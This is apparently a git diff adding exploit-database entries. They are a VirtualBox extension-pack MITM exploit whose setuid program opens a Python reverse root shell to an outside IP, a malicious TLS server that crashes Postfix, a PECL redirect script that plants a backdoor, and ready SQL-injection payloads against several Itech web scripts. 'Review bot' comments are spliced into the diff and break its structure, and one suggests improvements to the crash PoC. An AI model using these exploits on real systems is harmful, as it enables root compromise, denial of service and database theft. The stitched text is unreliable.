diff --git a/platforms/linux/local/41196.txt b/platforms/linux/local/41196.txt
new file mode 100755
index 000000000..7f3e137dd
--- /dev/null
+++ b/platforms/linux/local/41196.txt
@@ -0,0 +1,192 @@
+== [ Overview ] ===
+
+ System affected: VirtualBox
+ Software-Version: prior to 5.0.32, prior to 5.1.14
+ User-Interaction: Required
+ Impact: A Man-In-The-Middle could infiltrate an
+Extension-Pack-Update to gain a root-shell
+
+=== [ Detailed description ] ===
+
+In my research about update mechanism of open-source software I found
+vulnerabilities in Oracle's VirtualBox. It's possible to compromise a
+system behind a firewall by infiltrating the updates of Extension-Packs
+because of the following flaws:
+
+1. The Extension-Pack is updated via HTTP instead of HTTPS. The
+Extension-Packs are not signed, so a Man-In-The-Middle could send his
+own Extension-Pack(with malicious code included) instead of the regular
+update to the target. The Code would be executed with user-permissions.
+I reported this bug to Oracle but I think someone else discovered and
+reported it before. This bug also affects VirtualBox prior to 5.0.32,
+prior to 5.1.14. I don't know the CVE.
+
+2. CVE-2017-3316: There is a privilege escalation bug in the downloader
+of VirtualBox. Extension-Packs are tar-archives. Tar-archives can
+preserve permissions. A Man-In-The-Middle could include an executable
+with setuid-permissions to the Extension-Pack. If the victim downloads
+the Ext-pack, it will be stored as owner root and without checking the
+permissions of the binaries. This bug affects VirtualBox prior to
+5.0.32, prior to 5.1.14
+
+=== [ Proof-Of-Concept ] ===
+
+The executeable of the following code is placed in the
+Extension-Pack-Archive under linux.amd64/evil with setuid.
+
+/* evil.c(executable with the reverse-shell) */
+#include
+
+int main()
+{
+ setuid(0);
+ execl("/usr/bin/python","python","-c","import
+socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.12.32.15\",5000));os.dup2(s.fileno(),0);
+os.dup2(s.fileno(),1);
+os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/bash\",\"-i\"]);",NULL);
+ return 0;
+}
+
+The VirtualBox-Sources are downloaded next and the following code has
+to be placed under src/VBox/ExtPacks/Evil/VBoxEvilMain.cpp:
+
+/* $Id: VBoxEvilMain.cpp $ */
+/** @file
+ * Evil main module.
+ */
+
+/*
+ * Copyright (C) 2010-2016 Oracle Corporation
+ *
+ * Permission is hereby granted, free of charge, to any person
+ * obtaining a copy of this software and associated documentation
+ * files (the "Software"), to deal in the Software without
+ * restriction, including without limitation the rights to use,
+ * copy, modify, merge, publish, distribute, sublicense, and/or sell
+ * copies of the Software, and to permit persons to whom the
+ * Software is furnished to do so, subject to the following
+ * conditions:
+ *
+ * The above copyright notice and this permission notice shall be
+ * included in all copies or substantial portions of the Software.
+ *
+ * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
+ * EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES
+ * OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
+ * NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
+ * HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
+ * WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
+ * FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
+ * OTHER DEALINGS IN THE SOFTWARE.
+ */
+
+#include
+
+#include
+#include
+#include
+#include
+#include
+#include
+
+
+
+static PCVBOXEXTPACKHLP g_pHlp;
+
+static const VBOXEXTPACKREG g_vboxEvilExtPackReg =
+{
+ VBOXEXTPACKREG_VERSION,
+ /* .uVBoxFullVersion = */ VBOX_FULL_VERSION,
+ /* .pfnInstalled = */ NULL,
+ /* .pfnUninstall = */ NULL,
+ /* .pfnVirtualBoxReady =*/ NULL,
+ /* .pfnConsoleReady = */ NULL,
+ /* .pfnUnload = */ NULL,
+ /* .pfnVMCreated = */ NULL,
+ /* .pfnVMConfigureVMM = */ NULL,
+ /* .pfnVMPowerOn = */ NULL,
+ /* .pfnVMPowerOff = */ NULL,
+ /* .pfnQueryObject = */ NULL,
+ /* .pfnReserved1 = */ NULL,
+ /* .pfnReserved2 = */ NULL,
+ /* .pfnReserved3 = */ NULL,
+ /* .pfnReserved4 = */ NULL,
+ /* .pfnReserved5 = */ NULL,
+ /* .pfnReserved6 = */ NULL,
+ /* .u32Reserved7 = */ 0,
+ VBOXEXTPACKREG_VERSION
+};
+
+#include
+/** @callback_method_impl{FNVBOXEXTPACKREGISTER} */
+extern "C" DECLEXPORT(int) VBoxExtPackRegister(PCVBOXEXTPACKHLP pHlp,
+PCVBOXEXTPACKREG *ppReg, PRTERRINFO pErrInfo)
+{
+
+ pid_t pid = fork();
+ if(pid == 0)
+ {
+
+execl("/usr/lib/virtualbox/ExtensionPacks/Oracle_VM_VirtualBox_Extension_Pack/linux.amd64/evil","evil",NULL);
+ }
+ /*
+ * Check the VirtualBox version.
+ */
+ if (!VBOXEXTPACK_IS_VER_COMPAT(pHlp->u32Version,
+VBOXEXTPACKHLP_VERSION))
+ return RTErrInfoSetF(pErrInfo, VERR_VERSION_MISMATCH,
+ "Helper version mismatch - expected %#x got
+%#x",
+ VBOXEXTPACKHLP_VERSION, pHlp->u32Version);
+ if ( VBOX_FULL_VERSION_GET_MAJOR(pHlp->uVBoxFullVersion) !=
+VBOX_VERSION_MAJOR
+ || VBOX_FULL_VERSION_GET_MINOR(pHlp->uVBoxFullVersion) !=
+VBOX_VERSION_MINOR)
+ return RTErrInfoSetF(pErrInfo, VERR_VERSION_MISMATCH,
+ "VirtualBox version mismatch - expected
+%u.%u got %u.%u",
+ VBOX_VERSION_MAJOR, VBOX_VERSION_MINOR,
+
+VBOX_FULL_VERSION_GET_MAJOR(pHlp->uVBoxFullVersion),
+
+VBOX_FULL_VERSION_GET_MINOR(pHlp->uVBoxFullVersion));
+
+ /*
+ * We're good, save input and return the registration structure.
+ */
+ g_pHlp = pHlp;
+ *ppReg = &g_vboxEvilExtPackReg;
+
+ return VINF_SUCCESS;
+}
+
+After compiling, this Extension-Pack-Module is placed in the Archive
+under linux.amd64/VBoxEvilMain.so. It's also necessary to modify the
+ExtPack.xml so that the Evil-Module is used:
+
+
+
+ Oracle VM VirtualBox Extension Pack
+ USB 2.0 and USB 3.0 Host Controller, Host Webcam,
+VirtualBox RDP, PXE ROM, Disk Encryption.
+ 5.1.10
+ VBoxEvilMain
+ VBoxVRDP
+
+
+
+Note: To make this Extension-Pack valid it is necessary to add all the
+file-checksumms to ExtPack.manifest. The victim will be asked for the
+root password during the update. If the attacker sends this malicious
+Extension-Pack, a reverse root-shell will be executed.
+
+=== [ Timeline ] ===
+
+This bug was reported in December. Oracle answered on the same day and
+gave status reports regularly. They released a patch on January 17th.
+
+=== [ Credits ] ===
+
+CVE-2017-3316 was discovered by Wolfgang Hotwagner
+(https://tech.feedyourhead.at/content/privilege-escalation-in-virtualbox-cve-2017-3316)
\ No newline at end of file
diff --git a/platforms/multiple/dos/41192.c b/platforms/multiple/dos/41192.c
new file mode 100755
index 000000000..a431918d4
--- /dev/null
+++ b/platforms/multiple/dos/41192.c
@@ -0,0 +1,212 @@
+// Source: https://guidovranken.wordpress.com/2017/01/26/cve-2017-3730-openssl-1-1-0-remote-client-denial-of-service-affects-servers-as-well-poc/
+
+/*
+ * SSL server demonstration program
+ *
+ * Copyright (C) 2006-2015, ARM Limited, All Rights Reserved
+ * SPDX-License-Identifier: Apache-2.0
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License"); you may
+ * not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
+ * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ * This file is part of mbed TLS (https://tls.mbed.org)
+ */
+
+/* Taken from mbed TLS programs/ssl/ssl_server.c and modified to crash postfix.
+ * Belongs to https://github.com/guidovranken/CVE-2017-3730
+*/
+#include
+#include
+
+#include "mbedtls/entropy.h"
+#include "mbedtls/ctr_drbg.h"
+#include "mbedtls/certs.h"
+#include "mbedtls/x509.h"
+#include "mbedtls/ssl.h"
+#include "mbedtls/net_sockets.h"
+#include "mbedtls/error.h"
+#include "mbedtls/debug.h"
+
+static int write_and_get_response( mbedtls_net_context *sock_fd, char *buf, size_t len )
+{
+ int ret;
+
+ if ( (ret = mbedtls_net_send( sock_fd, (unsigned char*)buf, strlen(buf) )) <= 0 )
+ {
+ return -1;
+ }
+
+ memset( buf, 0, len );
+ ret = mbedtls_net_recv( sock_fd, (unsigned char*)buf, len );
+ return ret;
+}
+
+int main( void )
+{
+ int ret;
+ mbedtls_net_context listen_fd, client_fd;
+ char buf[1024];
+ const char *pers = "ssl_server";
+
+ int force_ciphersuite[2];
+ mbedtls_entropy_context entropy;
+ mbedtls_ctr_drbg_context ctr_drbg;
+ mbedtls_ssl_context ssl;
+ mbedtls_ssl_config conf;
+ mbedtls_x509_crt srvcert;
+ mbedtls_pk_context pkey;
+
+ mbedtls_net_init( &listen_fd );
+ mbedtls_net_init( &client_fd );
+ mbedtls_ssl_init( &ssl );
+ mbedtls_ssl_config_init( &conf );
+ mbedtls_x509_crt_init( &srvcert );
+ mbedtls_pk_init( &pkey );
+ mbedtls_entropy_init( &entropy );
+ mbedtls_ctr_drbg_init( &ctr_drbg );
+
+ ret = mbedtls_x509_crt_parse( &srvcert, (const unsigned char *) mbedtls_test_srv_crt,
+ mbedtls_test_srv_crt_len );
+ if( ret != 0 )
+ {
+ goto exit;
+ }
+
+ ret = mbedtls_x509_crt_parse( &srvcert, (const unsigned char *) mbedtls_test_cas_pem,
+ mbedtls_test_cas_pem_len );
+ if( ret != 0 )
+ {
+ goto exit;
+ }
+
+ ret = mbedtls_pk_parse_key( &pkey, (const unsigned char *) mbedtls_test_srv_key,
+ mbedtls_test_srv_key_len, NULL, 0 );
+ if( ret != 0 )
+ {
+ goto exit;
+ }
+
+ if( ( ret = mbedtls_net_bind( &listen_fd, NULL, "8888", MBEDTLS_NET_PROTO_TCP ) ) != 0 )
+ {
+ goto exit;
+ }
+
+ if( ( ret = mbedtls_ctr_drbg_seed( &ctr_drbg, mbedtls_entropy_func, &entropy,
+ (const unsigned char *) pers,
+ strlen( pers ) ) ) != 0 )
+ {
+ goto exit;
+ }
+
+ if( ( ret = mbedtls_ssl_config_defaults( &conf,
+ MBEDTLS_SSL_IS_SERVER,
+ MBEDTLS_SSL_TRANSPORT_STREAM,
+ MBEDTLS_SSL_PRESET_DEFAULT ) ) != 0 )
+ {
+ goto exit;
+ }
+
+ mbedtls_ssl_conf_rng( &conf, mbedtls_ctr_drbg_random, &ctr_drbg );
+
+
+ mbedtls_ssl_conf_ca_chain( &conf, srvcert.next, NULL );
+ if( ( ret = mbedtls_ssl_conf_own_cert( &conf, &srvcert, &pkey ) ) != 0 )
+ {
+ goto exit;
+ }
+
+ force_ciphersuite[0] = mbedtls_ssl_get_ciphersuite_id( "TLS-DHE-RSA-WITH-AES-256-GCM-SHA384" );
+ force_ciphersuite[1] = 0;
+ mbedtls_ssl_conf_ciphersuites( &conf, force_ciphersuite );
+
+ if( ( ret = mbedtls_ssl_setup( &ssl, &conf ) ) != 0 )
+ {
+ goto exit;
+ }
+
+reset:
+
+ mbedtls_net_free( &client_fd );
+
+ mbedtls_ssl_session_reset( &ssl );
+
+ if( ( ret = mbedtls_net_accept( &listen_fd, &client_fd,
+ NULL, 0, NULL ) ) != 0 )
+ {
+ goto exit;
+ }
+
+ sprintf(buf, "220 ok\n");
+ ret = write_and_get_response( &client_fd, buf, sizeof(buf));
+
+ if ( ret < 5 ) {
+ goto exit;
+ }
+
+ if ( strncmp(buf, "EHLO ", 5) != 0 ) {
+ goto exit;
+ }
+
+ sprintf(buf, "250-SIZE 157286400\n250-8BITMIME\n250-STARTTLS\n250-ENHANCEDSTATUSCODES\n250-PIPELINING\n250-CHUNKING\n250 SMTPUTF8\n");
+ ret = write_and_get_response( &client_fd, buf, sizeof(buf));
+
+ if ( ret < 8 ) {
+ goto exit;
+ }
+
+ if ( strncmp(buf, "STARTTLS", 8) != 0 ) {
+ goto exit;
+ }
+ sprintf(buf, "220 ok\n");
+ ret = mbedtls_net_send( &client_fd, (unsigned char*)buf, strlen(buf) );
+ if ( ret < 0 ) {
+ goto exit;
+ }
+
+ mbedtls_ssl_set_bio( &ssl, &client_fd, mbedtls_net_send, mbedtls_net_recv, NULL );
+
+
+ while( ( ret = mbedtls_ssl_handshake( &ssl ) ) != 0 )
+ {
+ if( ret != MBEDTLS_ERR_SSL_WANT_READ && ret != MBEDTLS_ERR_SSL_WANT_WRITE )
+ {
+ goto reset;
+ }
+ }
+
+ while( ( ret = mbedtls_ssl_close_notify( &ssl ) ) < 0 )
+ {
+ if( ret != MBEDTLS_ERR_SSL_WANT_READ &&
+ ret != MBEDTLS_ERR_SSL_WANT_WRITE )
+ {
+ goto reset;
+ }
+ }
+
+
+ ret = 0;
+ goto reset;
+
+exit:
+
+ mbedtls_net_free( &client_fd );
+ mbedtls_net_free( &listen_fd );
+
+ mbedtls_x509_crt_free( &srvcert );
+ mbedtls_pk_free( &pkey );
+ mbedtls_ssl_free( &ssl );
+ mbedtls_ssl_config_free( &conf );
+ mbedtls_ctr_drbg_free( &ctr_drbg );
+ mbedtls_entropy_free( &entropy );
+
+ return( ret );
+}
\ No newline at end of file
diff --git a/platforms/php/webapps/41185.txt b/platforms/php/webapps/41185.txt
new file mode 100755
index 000000000..c25131659
--- /dev/null
+++ b/platforms/php/webapps/41185.txt
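Review bot: The protocol checks after `mbedtls_net_accept` (`if ( ret < 5 )`, the `EHLO ` and `STARTTLS` `strncmp` tests) jump to `exit` while `ret` still holds the byte count returned by `write_and_get_response`, so an unexpected client greeting ends the process with a positive, meaningless exit status, and because nothing is printed on any failure path a reader cannot tell a protocol mismatch from an mbed TLS error. Setting an explicit status before leaving, `ret = -1; goto exit;`, and printing the mbed TLS code with `mbedtls_strerror` (error.h is already included) on the real error paths would make a lab reproduction diagnosable. Note also that `write_and_get_response` returns the raw `mbedtls_net_recv` result, so a negative `MBEDTLS_ERR_NET_*` value is silently folded into "too short" by the `< 5` / `< 8` comparisons. As a point of style, the three `sprintf(buf, …)` calls into the fixed 1024-byte `buf` are safe only because the format strings are constants; `snprintf(buf, sizeof buf, …)` states that bound explicitly. `mbedtls_net_bind( &listen_fd, NULL, "8888", … )` listens on every interface, which is worth restricting to loopback for a lab setup.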
@@ -0,0 +1,140 @@ +[+]############################################################################################# +[+] Credits / Discovery: John Page AKA hyp3rlinx +[+] Website: hyp3rlinx.altervista.org +[+] Source: http://hyp3rlinx.altervista.org/advisories/PEAR-ARBITRARY-FILE-DOWNLOAD.txt +[+] ISR: ApparitionSEC +[+]############################################################################################# + + + +Vendor: +============ +pear.php.net + + + +Product: +=================================== +PEAR Base System v1.10.1 +PEAR Installer's download utility + + + +Vulnerability Type: +======================= +Arbitrary File Download + + + +CVE Reference: +============== +CVE-2017-5630 + + + +Security Issue: +================ + +The download utility class in the Installer in PEAR Base System v1.10.1, does not validate file types and filenames after a redirect, +which allows remote HTTP servers to overwrite files via crafted responses, as demonstrated by a .htaccess overwrite. + +e.g. + +pecl download + +PEAR does not rename the arbitrary invalid file to the originally requested (safe) filename. +Therefore, attackers can overwrite files or download a backdoor if the PECL request is made from from web accesible directory etc.. + +Moreover, PECL doesn't delete these invalid files upon download, giving the attacker time to exploit it if attackers +can force the HTTP connection to stay open, and before a "invalid file message" is noticed. + +POC Video: +https://vimeo.com/201341280 + + +Proof of concept: +This POC involves 3 machines: +First machine is victim making a PECL download command request +Second is the vuln server receiving the file download request +Third is the malicious server hosting the PHP backdoor, .htaccess file etc. +=========================================================================== + +1) Victim machine attempts to download a legit ".tgz" archive. 
+ +pecl download http://VULN-SERVER:8080/Test.tgz + + +2) VULN-SERVER where the victim is requesting "Test.tgz", and attacker controls HTTP response. + + +3) EVIL-SERVER where PECL follows and downloads 'unintended' Evil.php backdoor. +python -m SimpleHTTPServer 8888 + + +On VULN-SERVER run "PECL-File-Exploit.py" + +python PECL-File-Exploit.py + + +import socket + +HOST='localhost' +PORT=8080 +TARGET='http://EVIL-SERVER:8888/' +FILE='.htaccess' +s = socket.socket() +s.bind((HOST, PORT)) +s.listen(10) + +print 'Waiting for PECL connections...' + + +while True: + conn, addr = s.accept() + junk = conn.recv(512) + conn.send('HTTP/1.1 302 Found\r\n') + conn.send('Location: '+TARGET+FILE+'\r\n') + conn.close() +s.close() + + + +Then, make request for Test.tgz... + +C:\xampp\htdocs\webapp>pecl download http://VULN-SERVER:8080/Test.tgz + +downloading Evil.php ... +Starting to download Evil.php (4,665 bytes) +.....done: 4,665 bytes +File C:\xampp\htdocs\webapp\Evil.php downloaded + + + +Disclosure Timeline: +===================================== +Vendor Notification: January 11, 2017 +Informed "PECL package no longer maintained" : January 23, 2017 +Opened Bug #2117 : January 25, 2017 +January 29, 2017 : Public Disclosure + + + +Network Access: +================ +Remote + + + +Severity: +========= +High + + + +[+] Disclaimer +The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. +Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and +that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit +is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility +for any damage caused by the use or misuse of this information. 
The author prohibits any malicious use of security related information
+or exploits by the author or elsewhere.
\ No newline at end of file
diff --git a/platforms/php/webapps/41186.txt b/platforms/php/webapps/41186.txt
new file mode 100755
index 000000000..d62a5b0d8
--- /dev/null
+++ b/platforms/php/webapps/41186.txt
@@ -0,0 +1,23 @@
+Exploit Title: Caregiver Script v2.57 – SQL Injection
+Date: 30.01.2017
+Vendor Homepage: http://itechscripts.com/
+Software Link: http://itechscripts.com/caregiver-script/
+Exploit Author: Kaan KAMIS
+Contact: iletisim[at]k2an[dot]com
+Website: http://k2an.com
+Category: Web Application Exploits
+
+Overview
+
+Caregiver Script 2.51 is the best solution to launch a portal for hiring people for babysitting and other care giving services in a hassle free manner.
+
+Type of vulnerability:
+
+An SQL Injection vulnerability in Caregiver Script allows attackers to read
+arbitrary administrator data from the database.
+
+Vulnerable Url:
+
+http://locahost/searchJob.php?sitterService=1[payload]
+Vulnerable parameter : sitterService
+Mehod : GET
diff --git a/platforms/php/webapps/41187.txt b/platforms/php/webapps/41187.txt
new file mode 100755
index 000000000..d46b2a686
--- /dev/null
+++ b/platforms/php/webapps/41187.txt
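Review bot: The PoC script and the console transcript in the Proof of concept section describe different runs: the script hardcodes `FILE='.htaccess'` as the redirect target, yet the transcript shows `downloading Evil.php ...`, so a reader cannot tell which file the shown output corresponds to. A comment above the script such as `# FILE selects what EVIL-SERVER serves; the transcript below was captured with Evil.php` would reconcile the two. In the Security Issue section, `from from web accesible directory` should read `from a web accessible directory`, and `a "invalid file message"` should be `an "invalid file message"`. The timeline entry `Opened Bug #2117` gives no tracker URL, so the vendor-side status cannot be verified from the advisory.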
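Review bot: The Exploit Title names `Caregiver Script v2.57` while the Overview paragraph describes `Caregiver Script 2.51`, so the tested version is ambiguous and one of the two should be corrected. The Vulnerable Url line uses `http://locahost/...`, a misspelling of `localhost` that recurs in 41187.txt, and `Mehod : GET` should read `Method : GET`. Unlike 41185.txt in this commit, the advisory carries no vendor-notification or disclosure date, which makes it hard for defenders to judge whether a fixed release exists.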
@@ -0,0 +1,30 @@
+Exploit Title: Itech Auction Script v6.49 – SQL Injection
+Date: 30.01.2017
+Vendor Homepage: http://itechscripts.com/
+Software Link: http://itechscripts.com/auction-script/
+Exploit Author: Kaan KAMIS
+Contact: iletisim[at]k2an[dot]com
+Website: http://k2an.com
+Category: Web Application Exploits
+
+Overview
+
+Auction Script v6.49 is the best standard auction product. This also comes pre-integrated with a robust Multi-Vendor interface and a powerful CMS panel.
+
+Type of vulnerability:
+
+An SQL Injection vulnerability in Itech Auction Script allows attackers to read
+arbitrary data from the database.
+
+Vulnerability:
+
+URL : http://locahost/mcategory.php?mcid=4[payload]
+
+Parameter: mcid (GET)
+Type: boolean-based blind
+Title: AND boolean-based blind - WHERE or HAVING clause
+Payload: mcid=4' AND 1734=1734 AND 'Ggks'='Ggks
+
+Type: UNION query
+Title: Generic UNION query (NULL) - 1 column
+Payload: mcid=-5980' UNION ALL SELECT CONCAT(0x71706b7171,0x764646494f4c7178786f706c4b4749517349686768525865666c6b6456434c766b73755a44657777,0x7171706a71)-- XAee
diff --git a/platforms/php/webapps/41188.txt b/platforms/php/webapps/41188.txt
new file mode 100755
index 000000000..94b5282e5
--- /dev/null
+++ b/platforms/php/webapps/41188.txt
@@ -0,0 +1,34 @@ +Exploit Title: Itech B2B Script v4.28 – SQL Injection +Date: 30.01.2017 +Vendor Homepage: http://itechscripts.com/ +Software Link: http://itechscripts.com/b2b-script/ +Exploit Author: Kaan KAMIS +Contact: iletisim[at]k2an[dot]com +Website: http://k2an.com +Category: Web Application Exploits + +Overview + +B2B Script v4.28 is a versatile web solution for the webmasters who are willing to launch their own B2B Portal within a few minutes. + +Type of vulnerability: + +An SQL Injection vulnerability in Itech B2B Script v4.28 allows attackers to read +arbitrary data from the database. + +Vulnerability: + +URL : catcompany.php?token=704667c6a1e7ce56d3d6fa748ab6d9af3fd7[payload] + +Parameter: #1* (URI) + Type: boolean-based blind + Title: AND boolean-based blind - WHERE or HAVING clause + Payload: http://localhost/catcompany.php?token=704667c6a1e7ce56d3d6fa748ab6d9af3fd7' AND 6539=6539 AND 'Fakj'='Fakj + + Type: AND/OR time-based blind + Title: MySQL >= 5.0.12 OR time-based blind + Payload: http://localhost/catcompany.php?token=704667c6a1e7ce56d3d6fa748ab6d9af3fd7' OR SLEEP(5) AND 'aEyV'='aEyV + + Type: UNION query + Title: Generic UNION query (NULL) - 6 columns + Payload: http://localhost/catcompany.php?token=-4421' UNION ALL SELECT NULL,CONCAT(0x71627a7071,0x596a5174756f74736847615667486444426f697a5549434943697a697064466865494a7156794770,0x716b707a71),NULL,NULL,NULL,NULL-- JwUA --- diff --git a/platforms/php/webapps/41189.txt b/platforms/php/webapps/41189.txt new file mode 100755 index 000000000..b1ee79b50 --- /dev/null +++ b/platforms/php/webapps/41189.txt 
@@ -0,0 +1,30 @@
+Exploit Title: Itech Classifieds Script v7.27 – SQL Injection
+Date: 30.01.2017
+Vendor Homepage: http://itechscripts.com/
+Software Link: http://itechscripts.com/classifieds-script/
+Exploit Author: Kaan KAMIS
+Contact: iletisim[at]k2an[dot]com
+Website: http://k2an.com
+Category: Web Application Exploits
+
+Overview
+
+Classifieds Script v7.27 is the best classifieds software. Try this script and present yourself with a robust digital platform.
+
+Type of vulnerability:
+
+An SQL Injection vulnerability in Classifieds Script v7.27 allows attackers to read
+arbitrary data from the database.
+
+Vulnerability:
+
+URL : http://localhost/subpage.php?scat=51[payload]
+
+Parameter: scat (GET)
+ Type: boolean-based blind
+ Title: AND boolean-based blind - WHERE or HAVING clause
+ Payload: scat=51' AND 4941=4941 AND 'hoCP'='hoCP
+
+ Type: UNION query
+ Title: Generic UNION query (NULL) - 26 columns
+ Payload: scat=51' UNION ALL SELECT CONCAT(0x7162787871,0x6d4d4d63544378716c72467441784342664b4a6f424d615951594f476c53465070635545505a7558,0x716b767671),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- SKES
diff --git a/platforms/php/webapps/41190.txt b/platforms/php/webapps/41190.txt
new file mode 100755
index 000000000..c4d21cde2
--- /dev/null
+++ b/platforms/php/webapps/41190.txt
@@ -0,0 +1,26 @@
+Exploit Title: Itech Dating Script v3.26 – SQL Injection
+Date: 30.01.2017
+Vendor Homepage: http://itechscripts.com/
+Software Link: http://itechscripts.com/dating-script/
+Exploit Author: Kaan KAMIS
+Contact: iletisim[at]k2an[dot]com
+Website: http://k2an.com
+Category: Web Application Exploits
+
+Overview
+
+Itech Dating Script v3.26 is a powerful platform to launch a dating portal. This product is extremely popular among the new webmasters.
+
+Type of vulnerability:
+
+An SQL Injection vulnerability in Itech Dating Script v3.26 allows attackers to read
+arbitrary data from the database.
+
+Vulnerability:
+
+URL : http://localhost/see_more_details.php?id=40[payload]
+
+Parameter: id (GET)
+Type: UNION query
+Title: Generic UNION query (NULL) - 29 columns
+Payload: id=40 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x717a7a6a71,0x61777373447a7141494372496e6c63596f6f62586e534e544b53656b7077534e704e755266517347,0x716a626271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- nZhVs
diff --git a/platforms/php/webapps/41191.txt b/platforms/php/webapps/41191.txt
new file mode 100755
index 000000000..74f7c94d0
--- /dev/null
+++ b/platforms/php/webapps/41191.txt
@@ -0,0 +1,26 @@
+Exploit Title: Itech Freelancer Script v5.13 – SQL Injection
+Date: 30.01.2017
+Vendor Homepage: http://itechscripts.com/
+Software Link: http://itechscripts.com/freelancer-script/
+Exploit Author: Kaan KAMIS
+Contact: iletisim[at]k2an[dot]com
+Website: http://k2an.com
+Category: Web Application Exploits
+
+Overview
+
+Itech Freelancer Script v5.13 is the best reverse auction script available online. Just install the product to launch your website within minutes. Please try the product now.
+
+Type of vulnerability:
+
+An SQL Injection vulnerability in Itech Freelancer Script v5.13 allows attackers to read
+arbitrary data from the database.
+
+Vulnerability:
+
+URL : http://localhost/category.php?sk=4[payload]
+
+Parameter: sk (GET)
+Type: UNION query
+Title: Generic UNION query (NULL) - 52 columns
+Payload: sk=1') UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7162787871,0x4c4d424a4d6549554b5878684e494a4464767161454a6d757a47454c697a4e4470544c46426e4765,0x71716b7071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- rbbL
diff --git a/platforms/php/webapps/41193.txt b/platforms/php/webapps/41193.txt
new file mode 100755
index 000000000..f4c1a2bbe
--- /dev/null
+++ b/platforms/php/webapps/41193.txt
@@ -0,0 +1,35 @@
+Exploit Title: Itech Multi Vendor Script 6.49 – SQL Injection
+Date: 30.01.2017
+Vendor Homepage: http://itechscripts.com/
+Software Link: http://itechscripts.com/multi-vendor-shopping-script/
+Exploit Author: Kaan KAMIS
+Contact: iletisim[at]k2an[dot]com
+Website: http://k2an.com
+Category: Web Application Exploits
+
+Overview
+
+Multi Vendor Script v6.49 offers a robust eCommerce platform. The script has been designed to deliver all major features required to run an eCommerce website.
+
+Type of vulnerability:
+
+An SQL Injection vulnerability in Itech Multi Vendor Script 6.49 allows attackers to read
+arbitrary data from the database.
+
+Vulnerability:
+
+http://localhost/multi-vendor-shopping-script/product-list.php?pl=[payload]
+
+Parameter: #1* (URI)
+ Type: boolean-based blind
+ Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
+ Payload: http://localhost/multi-vendor-shopping-script/product-list.php?pl=11201ff1de774005f8da13f42943881c655f' RLIKE (SELECT (CASE WHEN (6851=6851) THEN 0x313132303166663164653737343030356638646131336634323934333838316336353566 ELSE 0x28 END))-- HnQm
+
+ Type: AND/OR time-based blind
+ Title: MySQL >= 5.0.12 AND time-based blind
+ Payload: http://localhost/multi-vendor-shopping-script/product-list.php?pl=11201ff1de774005f8da13f42943881c655f' AND SLEEP(5)-- WHze
+
+ Type: UNION query
+ Title: MySQL UNION query (NULL) - 5 columns
+ Payload: http://localhost/multi-vendor-shopping-script/product-list.php?pl=-3569' UNION ALL SELECT CONCAT(0x716b6a7871,0x7573485a716b767347544870695571415a465846434b5541777566416a6571656d6a5a6c62526f47,0x7170627171),NULL,NULL,NULL,NULL#
+---
diff --git a/platforms/php/webapps/41194.txt b/platforms/php/webapps/41194.txt
new file mode 100755
index 000000000..79e958c12
--- /dev/null
+++ b/platforms/php/webapps/41194.txt
@@ -0,0 +1,34 @@
+Exploit Title: Itech News Portal Script v6.28 – SQL Injection
+Date: 30.01.2017
+Vendor Homepage: http://itechscripts.com/
+Software Link: http://itechscripts.com/news-portal-script/
+Exploit Author: Kaan KAMIS
+Contact: iletisim[at]k2an[dot]com
+Website: http://k2an.com
+Category: Web Application Exploits
+
+Overview
+
+News Portal Script v6.28 is a CMS Software developed as a news broadcasting portal. This product is considered as the best in this category.
+
+Type of vulnerability:
+
+An SQL Injection vulnerability in News Portal Script v6.28 allows attackers to read
+arbitrary data from the database.
+
+Vulnerability:
+
+http://localhost/news-portal-script/information.php?inf=22[payload]
+
+Parameter: inf (GET)
+ Type: boolean-based blind
+ Title: AND boolean-based blind - WHERE or HAVING clause
+ Payload: inf=22 AND 3993=3993
+
+ Type: AND/OR time-based blind
+ Title: MySQL >= 5.0.12 OR time-based blind
+ Payload: inf=22 OR SLEEP(5)
+
+ Type: UNION query
+ Title: Generic UNION query (NULL) - 14 columns
+ Payload: inf=-1695 UNION ALL SELECT CONCAT(0x716a787171,0x7356527144546c6e6b47714b49415759595952764c734a657165476f4d496e534e565668666f786f,0x7178787671),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- trhS
